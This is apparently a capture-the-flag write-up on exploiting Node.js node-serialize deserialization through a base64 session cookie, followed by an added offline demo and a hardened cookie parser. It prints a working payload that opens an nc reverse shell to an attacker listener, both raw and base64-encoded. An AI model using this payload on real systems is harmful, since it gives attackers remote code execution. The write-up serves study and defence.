Celestial

Short snippet on Node.js deserialization (node-serialize)

We are presented with a node.js application that upon refresh returns dynamic content.

Decoding the base64 cookie reveals a serialized JSON object, so the Node.js application is keeping session state client-side and deserializing whatever we send back:

{"username":"Dummy","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"3"}

Every field of that object goes through the deserializer, so the username field is a natural injection point; let's put our reverse shell payload in it (10.10.16.2:1234 is the attacker's listener).

{"username":"_$$ND_FUNC$$_function() {require('child_process').exec('rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.2 1234>/tmp/f', (error, stdout, stderr) => { console.log(stdout); }); } ()"}
// the same payload, base64-encoded as it is sent in the cookie
eyJ1c2VybmFtZSI6Il8kJE5EX0ZVTkMkJF9mdW5jdGlvbigpIHtyZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygncm0gLWYgL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTAuMTAuMTYuMiAxMjM0Pi90bXAvZicsIChlcnJvciwgc3Rkb3V0LCBzdGRlcnIpID0+IHsgY29uc29sZS5sb2coc3Rkb3V0KTsgfSk7IH0gKCkifQ==

The _$$ND_FUNC$$_ prefix is the marker node-serialize uses for a serialized function: its unserialize() strips the prefix and passes the rest of the string to eval(). The application never has to call the revived function, because the () we appended to the function expression turns it into an IIFE (immediately invoked function expression), so the reverse shell command runs the moment the cookie is deserialized.

With that, we get our shell.
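The following is an added example, not code from the original writeup and not node-serialize's own source. It re-implements the function-reviving pattern of node-serialize's unserialize() in a few lines so the IIFE trick can be run offline with a harmless payload (the function only appends to a global array instead of spawning a shell), shows what happens when the trailing () is left off, and contrasts it with a cookie parser that never revives functions. Cookie contents, field names and the __sideEffects global are constructed for the demo.

```javascript
// Added example (not code from the page, and not node-serialize's source):
// a re-implementation of the function-reviving pattern node-serialize's
// unserialize() uses, so the IIFE trick can be run offline with a harmless
// payload, next to a cookie parser that never revives functions.
// Run with: node celestial_demo.js

const FUNC_PREFIX = '_$$ND_FUNC$$_';

// Vulnerable pattern (mirrors node-serialize's behaviour, not its code): any
// string starting with the marker is stripped of it and handed to eval(),
// wrapped in parentheses so a bare function expression parses.
function unsafeUnserialize(json) {
  const revive = (value) => {
    if (typeof value === 'string' && value.startsWith(FUNC_PREFIX)) {
      return eval('(' + value.slice(FUNC_PREFIX.length) + ')');
    }
    if (value !== null && typeof value === 'object') {
      for (const key of Object.keys(value)) value[key] = revive(value[key]);
    }
    return value;
  };
  return revive(JSON.parse(json));
}

function encodeCookie(obj) {
  return Buffer.from(JSON.stringify(obj)).toString('base64');
}

function decodeCookie(b64) {
  return Buffer.from(b64, 'base64').toString('utf8');
}

// Constructed cookies. The function bodies only push to a global array
// instead of running a reverse shell; the trailing () on the first one is
// what makes it an IIFE.
const cookieWithIife = encodeCookie({
  username: FUNC_PREFIX +
    "function(){ globalThis.__sideEffects.push('ran during unserialize'); return 'owned'; }()",
});
const cookieWithoutIife = encodeCookie({
  username: FUNC_PREFIX +
    "function(){ globalThis.__sideEffects.push('ran when called'); return 'owned'; }",
});
// The page's benign session object, and the same shape with the marker in username.
const benignCookie = encodeCookie({
  username: 'Dummy', country: 'Idk Probably Somewhere Dumb', city: 'Lametown', num: '3',
});
const hostileFullCookie = encodeCookie({
  username: FUNC_PREFIX + "function(){ globalThis.__sideEffects.push('nope'); return 'x'; }()",
  country: 'c', city: 'c', num: '1',
});

// Run a cookie through the vulnerable parser and report what came out.
function demoUnsafe(b64) {
  globalThis.__sideEffects = [];
  const obj = unsafeUnserialize(decodeCookie(b64));
  return {
    usernameType: typeof obj.username,
    username: typeof obj.username === 'string' ? obj.username : null,
    sideEffects: globalThis.__sideEffects.slice(),
  };
}

// Hardened parser: JSON.parse alone cannot produce a function, and each
// field is checked against the shape the app expects. A string that happens
// to start with the marker stays an inert string.
const SESSION_FIELDS = ['username', 'country', 'city', 'num'];
function safeParseCookie(b64) {
  const parsed = JSON.parse(decodeCookie(b64));
  if (parsed === null || typeof parsed !== 'object' || Array.isArray(parsed)) {
    throw new Error('cookie is not a JSON object');
  }
  const session = {};
  for (const field of SESSION_FIELDS) {
    const v = parsed[field];
    if (typeof v !== 'string' || v.length > 256) throw new Error('bad field: ' + field);
    session[field] = v;
  }
  return session;
}

function demoSafe(b64) {
  globalThis.__sideEffects = [];
  const session = safeParseCookie(b64);
  return { username: session.username, sideEffects: globalThis.__sideEffects.slice() };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('IIFE payload:   ', demoUnsafe(cookieWithIife));
  console.log('no-IIFE payload:', demoUnsafe(cookieWithoutIife));
  console.log('safe, benign:   ', demoSafe(benignCookie));
  console.log('safe, hostile:  ', demoSafe(hostileFullCookie));
}
```

With the IIFE cookie the side effect fires inside unsafeUnserialize() and username comes back as the function's return value; without the trailing () username is merely a function object that nothing ever calls, which is why the writeup's payload needs the (). The safe parser returns the marker string verbatim and never evaluates it, and it rejects the writeup's single-field payload outright because the session shape is enforced.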
